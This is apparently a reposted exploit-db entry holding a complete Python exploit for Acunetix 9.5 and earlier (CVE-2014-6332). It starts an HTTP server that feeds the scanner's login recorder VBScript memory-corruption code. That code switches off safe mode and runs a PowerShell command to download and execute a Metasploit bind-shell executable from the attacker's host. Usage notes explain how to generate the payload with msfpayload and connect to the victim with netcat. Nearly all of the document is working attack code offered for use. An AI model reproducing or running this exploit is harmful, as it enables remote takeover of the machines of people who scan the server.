Acunetix <=9.5 - OLE Automation Array Remote Code Execution

admin

1. #!/usr/bin/python
   
2. 
   
3. import BaseHTTPServer, sys, socket
   
4. 
   
5. ##
   
6. # Acunetix OLE Automation Array Remote Code Execution
   
7. #
   
8. # Author: Naser Farhadi
   
9. # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
   
10. #
    
11. # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
    
12. # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
    
13. # Target Login Sequence
    
14. # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
    
15. # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
    
16. # Metasploit windows/shell_bind_tcp Executable Payload
    
17. # And Finally You Can Connect To Victim Machine Using Netcat   
    
18. # Usage:
    
19. #       chmod +x acunetix.py
    
20. #       ./acunetix.py
    
21. #       Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
    
22. #       nc 192.168.1.7 333
    
23. # Payload Generated By This Command:    msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
    
24. #
    
25. # Video: https://vid.me/SRCb
    
26. ##
    
27. 
    
28. class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    
29.     def do_GET(req):
    
30.         req.send_response(200)
    
31.         if req.path == "/acunetix.exe":
    
32.             req.send_header('Content-type', 'application/exe')
    
33.             req.end_headers()
    
34.             exe = open("acunetix.exe", 'rb')
    
35.             req.wfile.write(exe.read())
    
36.             exe.close()
    
37.         else:
    
38.             req.send_header('Content-type', 'text/html')
    
39.             req.end_headers()
    
40.             req.wfile.write("""Please scan me!
    
41.                             <SCRIPT LANGUAGE="VBScript">
    
42.                             function runmumaa()
    
43.                             On Error Resume Next
    
44.                             set shell=createobject("Shell.Application")
    
45.                             command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
    
46.                             'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
    
47.                             shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
    
48.                             end function
    
49. 
    
50.                             dim   aa()
    
51.                             dim   ab()
    
52.                             dim   a0
    
53.                             dim   a1
    
54.                             dim   a2
    
55.                             dim   a3
    
56.                             dim   win9x
    
57.                             dim   intVersion
    
58.                             dim   rnda
    
59.                             dim   funclass
    
60.                             dim   myarray
    
61. 
    
62.                             Begin()
    
63. 
    
64.                             function Begin()
    
65.                               On Error Resume Next
    
66.                               info=Navigator.UserAgent
    
67. 
    
68.                               if(instr(info,"Win64")>0)   then
    
69.                                  exit   function
    
70.                               end if
    
71. 
    
72.                               if (instr(info,"MSIE")>0)   then
    
73.                                          intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
    
74.                               else
    
75.                                  exit   function  
    
76.                                          
    
77.                               end if
    
78. 
    
79.                               win9x=0
    
80. 
    
81.                               BeginInit()
    
82.                               If Create()=True Then
    
83.                                  myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    
84.                                  myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    
85. 
    
86.                                  if(intVersion<4) then
    
87.                                      document.write("<br> IE")
    
88.                                      document.write(intVersion)
    
89.                                      runshellcode()                    
    
90.                                  else  
    
91.                                       setnotsafemode()
    
92.                                  end if
    
93.                               end if
    
94.                             end function
    
95. 
    
96.                             function BeginInit()
    
97.                                Randomize()
    
98.                                redim aa(5)
    
99.                                redim ab(5)
    
100.                                a0=13+17*rnd(6)
     
101.                                a3=7+3*rnd(5)
     
102.                             end function
     
103. 
     
104.                             function Create()
     
105.                               On Error Resume Next
     
106.                               dim i
     
107.                               Create=False
     
108.                               For i = 0 To 400
     
109.                                 If Over()=True Then
     
110.                                 '   document.write(i)     
     
111.                                    Create=True
     
112.                                    Exit For
     
113.                                 End If
     
114.                               Next
     
115.                             end function
     
116. 
     
117.                             sub testaa()
     
118.                             end sub
     
119. 
     
120.                             function mydata()
     
121.                                 On Error Resume Next
     
122.                                  i=testaa
     
123.                                  i=null
     
124.                                  redim  Preserve aa(a2)  
     
125.                               
     
126.                                  ab(0)=0
     
127.                                  aa(a1)=i
     
128.                                  ab(0)=6.36598737437801E-314
     
129. 
     
130.                                  aa(a1+2)=myarray
     
131.                                  ab(2)=1.74088534731324E-310  
     
132.                                  mydata=aa(a1)
     
133.                                  redim  Preserve aa(a0)  
     
134.                             end function
     
135. 
     
136. 
     
137.                             function setnotsafemode()
     
138.                                 On Error Resume Next
     
139.                                 i=mydata()  
     
140.                                 i=readmemo(i+8)
     
141.                                 i=readmemo(i+16)
     
142.                                 j=readmemo(i+&h134)  
     
143.                                 for k=0 to &h60 step 4
     
144.                                     j=readmemo(i+&h120+k)
     
145.                                     if(j=14) then
     
146.                                           j=0         
     
147.                                           redim  Preserve aa(a2)            
     
148.                                  aa(a1+2)(i+&h11c+k)=ab(4)
     
149.                                           redim  Preserve aa(a0)  
     
150. 
     
151.                                  j=0
     
152.                                           j=readmemo(i+&h120+k)   
     
153.                                     
     
154.                                            Exit for
     
155.                                        end if
     
156. 
     
157.                                 next
     
158.                                 ab(2)=1.69759663316747E-313
     
159.                                 runmumaa()
     
160.                             end function
     
161. 
     
162.                             function Over()
     
163.                                 On Error Resume Next
     
164.                                 dim type1,type2,type3
     
165.                                 Over=False
     
166.                                 a0=a0+a3
     
167.                                 a1=a0+2
     
168.                                 a2=a0+&h8000000
     
169.                               
     
170.                                 redim  Preserve aa(a0)
     
171.                                 redim   ab(a0)     
     
172.                               
     
173.                                 redim  Preserve aa(a2)
     
174.                               
     
175.                                 type1=1
     
176.                                 ab(0)=1.123456789012345678901234567890
     
177.                                 aa(a0)=10
     
178.                                       
     
179.                                 If(IsObject(aa(a1-1)) = False) Then
     
180.                                    if(intVersion<4) then
     
181.                                        mem=cint(a0+1)*16            
     
182.                                        j=vartype(aa(a1-1))
     
183.                                        if((j=mem+4) or (j*8=mem+8)) then
     
184.                                           if(vartype(aa(a1-1))<>0)  Then   
     
185.                                              If(IsObject(aa(a1)) = False ) Then            
     
186.                                                type1=VarType(aa(a1))
     
187.                                              end if               
     
188.                                           end if
     
189.                                        else
     
190.                                          redim  Preserve aa(a0)
     
191.                                          exit  function
     
192. 
     
193.                                        end if
     
194.                                     else
     
195.                                        if(vartype(aa(a1-1))<>0)  Then   
     
196.                                           If(IsObject(aa(a1)) = False ) Then
     
197.                                               type1=VarType(aa(a1))
     
198.                                           end if               
     
199.                                         end if
     
200.                                     end if
     
201.                                 end if
     
202.                                           
     
203.                                 
     
204.                                 If(type1=&h2f66) Then         
     
205.                                       Over=True      
     
206.                                 End If  
     
207.                                 If(type1=&hB9AD) Then
     
208.                                       Over=True
     
209.                                       win9x=1
     
210.                                 End If  
     
211. 
     
212.                                 redim  Preserve aa(a0)         
     
213.                                     
     
214.                             end function
     
215. 
     
216.                             function ReadMemo(add)
     
217.                                 On Error Resume Next
     
218.                                 redim  Preserve aa(a2)  
     
219.                               
     
220.                                 ab(0)=0   
     
221.                                 aa(a1)=add+4     
     
222.                                 ab(0)=1.69759663316747E-313      
     
223.                                 ReadMemo=lenb(aa(a1))  
     
224.                               
     
225.                                 ab(0)=0   
     
226.                              
     
227.                                 redim  Preserve aa(a0)
     
228.                             end function
     
229. 
     
230.                             </script>""")
     
231. 
     
232. if __name__ == '__main__':
     
233.     sclass = BaseHTTPServer.HTTPServer
     
234.     server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
     
235.     print "Http server started", socket.gethostbyname(socket.gethostname()), 80
     
236.     try:
     
237.         server.serve_forever()
     
238.     except KeyboardInterrupt:
     
239.         pass
     
240.     server.server_close()

复制代码

https://www.exploit-db.com/exploits/36516/